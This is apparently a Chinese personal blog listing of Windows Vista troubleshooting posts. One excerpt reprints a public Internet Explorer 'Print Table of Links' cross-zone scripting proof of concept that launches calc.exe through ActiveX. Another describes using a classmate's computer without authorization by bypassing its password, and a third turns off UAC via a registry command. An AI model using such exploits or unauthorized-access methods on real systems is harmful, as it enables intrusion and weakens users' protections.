• 解决Vista启动的时候卡死在滚动条问题

    post by Holmesian / 2009-6-14 0:16 Sunday
    最近遇到了几台这样的本本

    阅读全文>>

  • Vista无法访问指定设备路径或文件

    post by Holmesian / 2008-11-1 11:11 Saturday
    遇到Vista无法访问指定设备路径或文件的解决方法
    刚才室友找我说一台装有Vista的电脑有问题
    我一看是系统没办法进桌面   我用任务管理器打开进程开 几乎没有进程了  可以看到的进程数是4个  进程数量是34  这和Vista庞大的体积是极为不相称的

    通过运行命令运行 explorer.exe   结果系统提示“Windows无法访问指定设备路径或文件…………”
    通过浏览功能  并以管理员权限运行 explorer.exe  终于可以看到桌面了  但是依旧无法运行任何.exe的文件

    经过一系列的探索 依旧还在尝试ing....
    网上的各式各样的方法都不能解决这个无法访问指定设备路径或文件的问题

    阅读全文>>

  • 无密码使用Vista

    post by Holmesian / 2008-10-13 22:52 Monday
    小小地无聊一下————
    无密码使用Vista的IE7以及通过后续Bug获得普通User权限

    经过一系列的折腾发现Vista自身的安全性能 果然 还是算不错的  几乎都无法利用常规的一些方法
    Vista的漏洞主要还是出在API上了 呵呵

    现在这篇日志是我在未经授权的情况下通过我同学的一台安装了Windows Vista的电脑发出的

    他本人现在不在旁边  ...

    阅读全文>>

  • 让Home版的Vista也能”组策略“

    post by Holmesian / 2008-9-6 14:39 Saturday
    在Vista时代,恢复组策略的方法和Win XP差不多,就是组件不同而已,具体步骤如下:

    1、将Vista任何一个含有gpedit.msc组策略功能版(例如企业版或者商业版)中的"WINDOWS\system32”文件夹中的gpedit.msc、fde.dll、gpedit.dll、 gptext.dll、wsecedit.dll文件复制到HOME版的“WINDOWS\system32”文件夹中。

    阅读全文>>

  • 解决”Vista无法全选文件夹“的问题

    post by Holmesian / 2008-9-5 13:38 Friday
    今天一个同学叫我去解决一个vista无法全选文件夹的问题:
    具体的症状就是在Vista的桌面上打开”计算机“, 再从”计算机“中打开任意一个分区,在分区的根目录下不能全选文件夹和文件,而在其子目录下就可以选定目录和文件夹。

    经过一番探索发现这是Vista的一个非常特殊的小BUG,有非常少的人会会遇到。
    所以在各种论坛和贴吧都几乎没有解决方法,最后终于通过以下的步骤解决了这个问题

    首先,关闭UAC(按Win开始键+R键打开运行,输入MSCONFIG,在最后一个选项卡里有相应的功能选择)。再按住 Win开始键+ R 键,打开“运行”对话框,键入如下命令后回车:
    reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

    阅读全文>>

  • 最新Vista下的IE 0Day漏洞

    post by Holmesian / 2008-5-20 2:56 Tuesday
    Vista下的0Day漏洞
    ASLR+DEP+UAC+PatchGuard+IE7(+IE8保护模式)+安全的1b的 Office2007+...

    超级安全的架构  终于露出一点问题了。。。。


    MS Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability
    具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

    如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 :)

    重现:
    1.下面这个地方打上勾
    点击在新窗口中浏览此图片


    2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。

    [quote]<html>
    <body >
    Print me with table of links to execute calc.exe
    <a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
    <script>window.print();</script>
    </body>
    </html>[/quote]